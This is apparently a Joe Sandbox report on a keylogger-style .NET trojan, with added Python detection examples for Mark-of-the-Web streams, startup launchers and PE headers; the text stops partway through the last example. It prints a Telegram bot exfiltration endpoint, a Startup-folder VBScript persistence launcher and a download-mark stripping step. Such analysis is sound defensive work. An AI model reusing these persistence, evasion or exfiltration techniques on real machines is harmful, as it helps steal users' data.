http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | TtLlwb3ava.exe, 00000000.00000002.1234437287.0000000002971000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030C3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot-/sendDocument?chat_id= | TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/ | TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
209.182.213.250 | mail.ncsp.pk | United States | 54641 | INMOTI-1US | false
104.21.80.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1634734
Start date and time: 2025-03-11 04:10:37 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: TtLlwb3ava.exe (renamed because the original name is a hash value)
Original Sample Name: 1622c28fa57b7ff8998eac6ae42e6cb6662446c47b25ff24befb841356267c7d.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 527
• Number of non-executed functions: 33
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.199.214.10, 4.245.163.56
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
04:11:36 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs
23:11:45 | API Interceptor | 22x Sleep call for process: InstallUtil.exe modified
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            132.226.8.169UQaaxEZwyg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            UO6rlOX6cT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • checkip.dyndns.org/
                                                                            miYVCPJgtg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            jmh61pt3ob.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            rmyOJqDzOdTXpHSh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            6x1aatLMNa.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • checkip.dyndns.org/
                                                                            zDW3yN4Qs2.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            tQe9Wh4CRA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            z0VHyUwtBk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            85e047k8bQ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            104.21.80.1PRI_VTK250419A.exeGet hashmaliciousLokibotBrowse
                                                                            • touxzw.ir/scc1/five/fre.php
| | DHL AWB Receipt_pdf.bat.exe | Get hash | malicious | FormBook | Browse | www.rbopisalive.cyou/2dxw/ |
| | Marzec 2025-faktura.pdf.exe | Get hash | malicious | FormBook | Browse | www.oldpay.online/u023/?lneDc=2js00DxFGjY6gHlVOW1q9a10L3HzPIs7WpRmaT2A/LnakQk0VzYAjcxSKMUcEwKHsPPKaiHoQA==&NvExnX=FrapFFYPB |
| | z1companyProfileandproducts.exe | Get hash | malicious | FormBook | Browse | www.dd87558.vip/uoki/ |
| | http://7a.ithuupvudv.ru | Get hash | malicious | Unknown | Browse | 7a.ithuupvudv.ru/favicon.ico |
| | PRI_VTK250419A.exe | Get hash | malicious | Lokibot | Browse | touxzw.ir/scc1/five/fre.php |
| | dfiCWCanbj.exe | Get hash | malicious | Lokibot | Browse | touxzw.ir/sccc/five/fre.php |
| | laser (2).ps1 | Get hash | malicious | FormBook | Browse | www.lucynoel6465.shop/jgkl/ |
| | laser.ps1 | Get hash | malicious | FormBook | Browse | www.tumbetgirislinki.fit/k566/ |
| | QUOTATION REQUEST.exe | Get hash | malicious | FormBook | Browse | www.shlomi.app/t3l4/ |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| reallyfreegeoip.org | ly1dkCzsOZ.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.112.1 |
| | UQaaxEZwyg.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.80.1 |
| | lOZOR68JAB.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.64.1 |
| | 1evYVracjk.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.96.1 |
| | tng2fDLoUK.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.32.1 |
| | UO6rlOX6cT.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.48.1 |
| | g24MtZOMrp.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.48.1 |
| | wkFEXQNJ9p.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.32.1 |
| | Nnsy4IvTvO.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.96.1 |
| | OkxI7TL5y9.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.96.1 |
| checkip.dyndns.com | ly1dkCzsOZ.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.247.73 |
| | UQaaxEZwyg.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169 |
| | lOZOR68JAB.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 193.122.6.168 |
| | 1evYVracjk.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.247.73 |
| | tng2fDLoUK.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.247.73 |
| | UO6rlOX6cT.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.8.169 |
| | g24MtZOMrp.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.247.73 |
| | wkFEXQNJ9p.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.247.73 |
| | Nnsy4IvTvO.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.247.73 |
| | OkxI7TL5y9.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 193.122.6.168 |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| CLOUDFLARENETUS | ly1dkCzsOZ.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.112.1 |
| | sY8Sfsplzf.exe | Get hash | malicious | FormBook | Browse | 104.21.112.1 |
| | UQaaxEZwyg.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.80.1 |
| | lOZOR68JAB.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.64.1 |
| | 1evYVracjk.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.96.1 |
| | tng2fDLoUK.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.32.1 |
| | UO6rlOX6cT.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.48.1 |
| | g24MtZOMrp.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.48.1 |
| | wkFEXQNJ9p.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.32.1 |
| | Nnsy4IvTvO.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.96.1 |
| UTMEMUS | ly1dkCzsOZ.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.247.73 |
| | UQaaxEZwyg.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169 |
| | 1evYVracjk.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.247.73 |
| | tng2fDLoUK.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.247.73 |
| | UO6rlOX6cT.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.8.169 |
| | g24MtZOMrp.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.247.73 |
| | wkFEXQNJ9p.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.247.73 |
| | Nnsy4IvTvO.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.247.73 |
| | miYVCPJgtg.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169 |
| | jmh61pt3ob.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169 |
| INMOTI-1US | yakov.arm7.elf | Get hash | malicious | Mirai | Browse | 70.39.239.245 |
| | 27#U0646.bat | Get hash | malicious | AsyncRAT | Browse | 23.235.204.134 |
| | https://compucallinc.com/ | Get hash | malicious | CAPTCHA Scam ClickFix | Browse | 69.174.52.100 |
| | https://compucallinc.com/ | Get hash | malicious | CAPTCHA Scam ClickFix | Browse | 69.174.52.100 |
| | trow.exe | Get hash | malicious | Unknown | Browse | 70.39.251.249 |
| | la.bot.m68k.elf | Get hash | malicious | Mirai | Browse | 70.39.239.250 |
| | rAttached_updat.vbs | Get hash | malicious | GuLoader, Remcos | Browse | 198.46.91.127 |
| | https://herald-review.com/users/logout-success/?expire=1626371676&referer_url=http://209.159.152.50 | Get hash | malicious | HTMLPhisher | Browse | 199.250.197.4 |
| | Mein-Dienstrad Proposal.eml | Get hash | malicious | HTMLPhisher | Browse | 144.208.72.199 |
| | https://secure.flyerpr.com/~cafemagui/wordpress/wp-includes/css/kr.html#jh.lee@hyundaielevator.com | Get hash | malicious | Unknown | Browse | 173.231.222.96 |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| 54328bd36c14bd82ddaa0c04b25ed9ad | ly1dkCzsOZ.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.80.1 |
| | UQaaxEZwyg.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.80.1 |
| | lOZOR68JAB.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.80.1 |
| | 1evYVracjk.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.80.1 |
| | tng2fDLoUK.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.80.1 |
| | UO6rlOX6cT.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.80.1 |
| | g24MtZOMrp.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.80.1 |
| | wkFEXQNJ9p.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.80.1 |
| | Nnsy4IvTvO.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.80.1 |
| | OkxI7TL5y9.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.80.1 |
                                                                            No context
                                                                            Process:C:\Users\user\Desktop\TtLlwb3ava.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1882112
                                                                            Entropy (8bit):7.5097475300709196
                                                                            Encrypted:false
                                                                            SSDEEP:49152:n1DIn7+d8JgCku5/s+BcCSnJH5yrD8PyhUxt:n1DSJRx9iV5ykvx
                                                                            MD5:1E20CE6BBF686369929E0D191F9607AD
                                                                            SHA1:7ABC4E70E996EC2E05BFC1417DB7DAF49D12032E
                                                                            SHA-256:1622C28FA57B7FF8998EAC6AE42E6CB6662446C47B25FF24BEFB841356267C7D
                                                                            SHA-512:91DA74714D1070C2BE62E54AB349CBBAE701A0B345BBD89F482D1CBD27B2D7B17C27DBD611445E5468B25083F18C2012CAED0526B531E0F8C2FB2720700A6ADD
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                                            Reputation:low
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@.g............................n.... ........@.. ....................... ............`.....................................O.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H.......h................ ..................................................h{I.Mh`.....h{9.....f...V....N.............BL......Pb.L....r.....+....h..n).SMG...;.j........B..Z......5...8..{.K.....E.0..t...A..Pb.%...?"...A....{Z...V ...A.o]..<]................0.L.../...5...;...=...C...............................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\TtLlwb3ava.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:modified
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:true
                                                                            Reputation:high, very likely benign file
                                                                            Preview:[ZoneTransfer]....ZoneId=0
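The 26-byte stream above is a Zone.Identifier alternate data stream, the Mark-of-the-Web that Windows keeps beside a downloaded file as a small INI. Its ZoneId is a URLZONE_* value: 3 (Internet) and 4 (Restricted Sites) are the zones SmartScreen and Office Protected View react to; 0 is Local Machine. Writing ZoneId=0 to a file the process has just dropped therefore leaves a stream in place but removes the download mark. The following parser is an added example for this report, not Joe Sandbox code or code from the sample. Its inputs are constructed: DROPPED_STREAM reconstructs the stream from the preview and size shown above (the exact line endings are an assumption), BROWSER_STREAM is a hypothetical browser-written stream for contrast, and example.invalid is a placeholder host.

```python
"""Interpret a Zone.Identifier (Mark-of-the-Web) alternate data stream.

Added example for this report; not Joe Sandbox code or code from the sample.
"""
import configparser

# URLZONE_* values from urlmon.h
URL_ZONES = {
    0: "Local Machine",
    1: "Local Intranet",
    2: "Trusted Sites",
    3: "Internet",
    4: "Restricted Sites",
}
DOWNLOAD_MARK_ZONES = {3, 4}  # zones Windows treats as "came from the web"

# Constructed inputs. DROPPED_STREAM is reconstructed from the report's preview and
# 26-byte size (line endings assumed); BROWSER_STREAM is a hypothetical stream of the
# kind a browser writes; the third is not a MotW stream at all.
DROPPED_STREAM = b"[ZoneTransfer]\r\nZoneId=0\r\n"
BROWSER_STREAM = (
    b"[ZoneTransfer]\r\nZoneId=3\r\n"
    b"ReferrerUrl=https://example.invalid/\r\n"
    b"HostUrl=https://example.invalid/files/setup.exe\r\n"
)
NOT_A_MOTW_STREAM = b"MZ\x90\x00 not an INI at all"


def parse_zone_identifier(raw: bytes) -> dict:
    """Return the [ZoneTransfer] key/value pairs, or {} if the stream is not a MotW INI."""
    text = raw.decode("utf-8", errors="replace").replace("\r\n", "\n")
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep ZoneId / HostUrl capitalisation as written
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    if not cp.has_section("ZoneTransfer"):
        return {}
    return dict(cp.items("ZoneTransfer"))


def classify_motw(raw: bytes) -> dict:
    """Summarise what the stream means for download-origin checks on the file."""
    fields = parse_zone_identifier(raw)
    if not fields:
        return {"has_motw": False, "zone_id": None, "zone_name": None,
                "treated_as_downloaded": False, "host_url": None}
    try:
        zone_id = int(fields.get("ZoneId", ""), 10)
    except ValueError:
        zone_id = None
    return {
        "has_motw": True,
        "zone_id": zone_id,
        "zone_name": URL_ZONES.get(zone_id, "unknown"),
        "treated_as_downloaded": zone_id in DOWNLOAD_MARK_ZONES,
        "host_url": fields.get("HostUrl"),
    }


def stream_looks_neutralised(raw: bytes) -> bool:
    """True when a MotW stream exists but names a non-download zone (0, 1 or 2).

    A process that writes such a stream onto a file it just dropped is a useful
    detection signal: legitimate downloaders write ZoneId=3, and clearing the mark
    (e.g. Unblock-File) deletes the stream rather than rewriting it with zone 0.
    """
    info = classify_motw(raw)
    return info["has_motw"] and info["zone_id"] is not None and not info["treated_as_downloaded"]


if __name__ == "__main__":
    for name, blob in (("dropped", DROPPED_STREAM), ("browser", BROWSER_STREAM),
                       ("garbage", NOT_A_MOTW_STREAM)):
        print(name, len(blob), classify_motw(blob), stream_looks_neutralised(blob))
```

On a live host the same bytes come from opening `<path>:Zone.Identifier` as a file; the parser is deliberately tolerant of blank lines and odd capitalisation because the stream is written by many different programs.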
                                                                            Process:C:\Users\user\Desktop\TtLlwb3ava.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):87
                                                                            Entropy (8bit):4.674867175354459
                                                                            Encrypted:false
                                                                            SSDEEP:3:FER/n0eFHHoN+EaKC5wER8n:FER/lFHIN7aZ5X8
                                                                            MD5:DED81AEC80162B95AD64656ED9B118DC
                                                                            SHA1:7BE42A2EB05E2441A89E66E17C875726072CD08D
                                                                            SHA-256:8987FEFE775B00296E5F5A74B7F0500A4E850524980E62E53D1A0710F2F2E0D9
                                                                            SHA-512:AEDB26A0AFDC549D773273550846D5B3C7A32CBCA45EA4F7FEBFF7A94026268A75A93200B52322AF3A42AF3195DC79BB3F0E5D7753A336C988D081AB7A3D650C
                                                                            Malicious:true
                                                                            Reputation:low
                                                                            Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Activator.exe"""
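The dropped .vbs is a single VBScript statement: CreateObject("WScript.Shell").Run followed by a string literal. Inside a VBScript literal a quote is escaped by doubling it, so `"""C:\...\Activator.exe"""` is the string `"C:\...\Activator.exe"` with the quotes included, i.e. an already-quoted command line handed to WScript.Shell.Run. Placed in the Startup folder, that launches a binary under the user's own AppData\Roaming at every logon without needing admin rights. The triage routine below is an added example for this report, not Joe Sandbox code or code from the sample: it recovers the launched command line from the script (undoing the quote doubling), splits off the executable, and flags targets under user-writable profile directories. DROPPED_VBS is the script content as displayed above; BENIGN_VBS is a hypothetical vendor launcher included only for contrast.

```python
"""Triage a WScript.Shell startup launcher script.

Added example for this report; not Joe Sandbox code or code from the sample.
"""
import re
from pathlib import PureWindowsPath

# Constructed inputs: the dropped script as shown in the report, and a hypothetical
# benign launcher (a vendor tool under Program Files with an argument) for contrast.
DROPPED_VBS = r'CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Activator.exe"""'
BENIGN_VBS = r'Set sh = CreateObject("WScript.Shell"): sh.Run """C:\Program Files\Vendor\Tool.exe"" --tray", 0, False'

# One VBScript string literal: the body is any run of non-quote chars or doubled quotes.
VB_STRING = re.compile(r'"((?:[^"]|"")*)"')
RUN_CALL = re.compile(r'\.Run\s+', re.IGNORECASE)
WSCRIPT_SHELL = re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.IGNORECASE)

# Directory sequences an unprivileged user can write to (compared case-insensitively).
USER_WRITABLE_SEQUENCES = (
    ("appdata", "roaming"), ("appdata", "local"), ("appdata", "locallow"),
    ("users", "public"), ("temp",), ("downloads",),
)


def vb_unescape(literal_body: str) -> str:
    """Undo VBScript's quote doubling inside a string literal body."""
    return literal_body.replace('""', '"')


def extract_run_command(vbs_source: str) -> "str | None":
    """Return the command-line string passed to WScript.Shell.Run, or None if absent.

    Adjacent literals joined with '&' are concatenated; parsing stops at the first
    argument separator (the optional window-style and wait-on-return parameters).
    """
    m = RUN_CALL.search(vbs_source)
    if not m:
        return None
    rest, pos, parts = vbs_source[m.end():], 0, []
    while True:
        lit = VB_STRING.match(rest, pos)
        if not lit:
            break
        parts.append(vb_unescape(lit.group(1)))
        pos = lit.end()
        amp = re.match(r"\s*&\s*", rest[pos:])
        if not amp:
            break
        pos += amp.end()
    return "".join(parts) if parts else None


def split_executable(command_line: str) -> tuple:
    """Split a Windows command line into (executable, arguments), honouring a quoted first token."""
    command_line = command_line.strip()
    if command_line.startswith('"'):
        end = command_line.find('"', 1)
        if end == -1:
            return command_line[1:], ""
        return command_line[1:end], command_line[end + 1:].strip()
    exe, _, args = command_line.partition(" ")
    return exe, args.strip()


def under_user_writable_dir(path: str) -> bool:
    """True if any directory component sequence of `path` is in USER_WRITABLE_SEQUENCES."""
    parts = tuple(p.lower().strip("\\") for p in PureWindowsPath(path).parts)
    for seq in USER_WRITABLE_SEQUENCES:
        # range excludes the final component so the file name itself cannot match
        for i in range(len(parts) - len(seq)):
            if parts[i:i + len(seq)] == seq:
                return True
    return False


def triage_launcher(vbs_source: str) -> dict:
    """Summarise what a startup .vbs launches and whether it matches the persistence pattern."""
    cmd = extract_run_command(vbs_source)
    result = {"uses_wscript_shell": bool(WSCRIPT_SHELL.search(vbs_source)),
              "command_line": cmd, "executable": None, "arguments": None,
              "target_user_writable": False, "suspicious": False}
    if cmd is None:
        return result
    exe, args = split_executable(cmd)
    result.update(executable=exe, arguments=args, target_user_writable=under_user_writable_dir(exe))
    result["suspicious"] = result["uses_wscript_shell"] and result["target_user_writable"]
    return result


if __name__ == "__main__":
    for src in (DROPPED_VBS, BENIGN_VBS):
        print(triage_launcher(src))
```

Run over every .vbs, .js and .wsf in `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup` (and the all-users equivalent under ProgramData) this gives a quick verdict per launcher; the check on the target directory is what separates this sample's `Activator.exe` under AppData\Roaming from a vendor tray helper under Program Files.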
                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.5097475300709196
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            File name:TtLlwb3ava.exe
                                                                            File size:1'882'112 bytes
                                                                            MD5:1e20ce6bbf686369929e0d191f9607ad
                                                                            SHA1:7abc4e70e996ec2e05bfc1417db7daf49d12032e
                                                                            SHA256:1622c28fa57b7ff8998eac6ae42e6cb6662446c47b25ff24befb841356267c7d
                                                                            SHA512:91da74714d1070c2be62e54ab349cbbae701a0b345bbd89f482d1cbd27b2d7b17c27dbd611445e5468b25083f18c2012caed0526b531e0f8c2fb2720700a6add
                                                                            SSDEEP:49152:n1DIn7+d8JgCku5/s+BcCSnJH5yrD8PyhUxt:n1DSJRx9iV5ykvx
                                                                            TLSH:7495E0107BE8DA1FE1BE1BB484B3A26597B1D49CE393E34F1EA464A96D537047D002B3
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..g............................n.... ........@.. ....................... ............`................................
                                                                            Icon Hash:90cececece8e8eb0
                                                                            Entrypoint:0x5ccd6e
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x67BBD340 [Mon Feb 24 02:02:40 2025 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
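A few of the header values above are worth turning into numbers rather than reading off the table. The TimeDateStamp is seconds since 1970 UTC; the DllCharacteristics names correspond to a single 16-bit word; the entry point is a VA relative to the 0x400000 image base; and the first instruction listed below, `jmp dword ptr [00402000h]`, is the native stub every managed EXE starts with: `FF 25 <IAT slot>` jumps through the import table to mscoree!_CorExeMain, so the real program is the IL reached via the CLR header, not the bytes at the entry point. The zero bytes that follow the stub disassemble as `add byte ptr [eax], al`, which is padding, not code. The decoder below is an added example for this report, not Joe Sandbox code. It uses only values printed in the report; the stub bytes are reconstructed from the disassembled instruction, and the ten zero bytes appended to it are constructed to stand for the padding.

```python
"""Decode the PE header values the report lists for this .NET sample.

Added example for this report; not Joe Sandbox code.
"""
import struct
from datetime import datetime, timezone

# Values as printed in the report.
IMAGE_BASE = 0x400000
ENTRYPOINT_VA = 0x5CCD6E
TIME_DATE_STAMP = 0x67BBD340
REPORTED_DLL_CHARACTERISTICS = ["HIGH_ENTROPY_VA", "DYNAMIC_BASE", "NX_COMPAT", "NO_SEH",
                                "TERMINAL_SERVER_AWARE"]
# jmp dword ptr [00402000h] encodes as FF 25 followed by the little-endian disp32.
ENTRY_STUB = bytes.fromhex("FF2500204000")
# Constructed: the report's listing continues with 00 00 pairs after the stub.
ENTRY_REGION = ENTRY_STUB + bytes(10)

# IMAGE_DLLCHARACTERISTICS_* bits from winnt.h
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def timestamp_to_utc(stamp: int) -> str:
    """Render IMAGE_FILE_HEADER.TimeDateStamp the way the report prints it."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC")


def dll_characteristics_from_names(names) -> int:
    """Reassemble the numeric DllCharacteristics word from the flag names."""
    by_name = {name: bit for bit, name in DLL_CHARACTERISTICS.items()}
    return sum(by_name[n] for n in names)


def dll_characteristics_to_names(value: int) -> list:
    """Expand a DllCharacteristics word into flag names, lowest bit first."""
    return [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if value & bit]


def va_to_rva(va: int, image_base: int = IMAGE_BASE) -> int:
    if va < image_base:
        raise ValueError("VA below image base")
    return va - image_base


def decode_entry_stub(stub: bytes, image_base: int = IMAGE_BASE) -> dict:
    """Decode FF 25 disp32 (jmp dword ptr [disp32]) and report the IAT slot it jumps through.

    For a managed EXE that slot is the only native import, mscoree!_CorExeMain.
    """
    if len(stub) < 6 or stub[:2] != b"\xff\x25":
        raise ValueError("entry point is not a jmp dword ptr [imm32] stub")
    slot_va = struct.unpack_from("<I", stub, 2)[0]
    return {"mnemonic": f"jmp dword ptr [{slot_va:08X}h]", "iat_slot_va": slot_va,
            "iat_slot_rva": va_to_rva(slot_va, image_base)}


def disassemble_stub_region(code: bytes) -> list:
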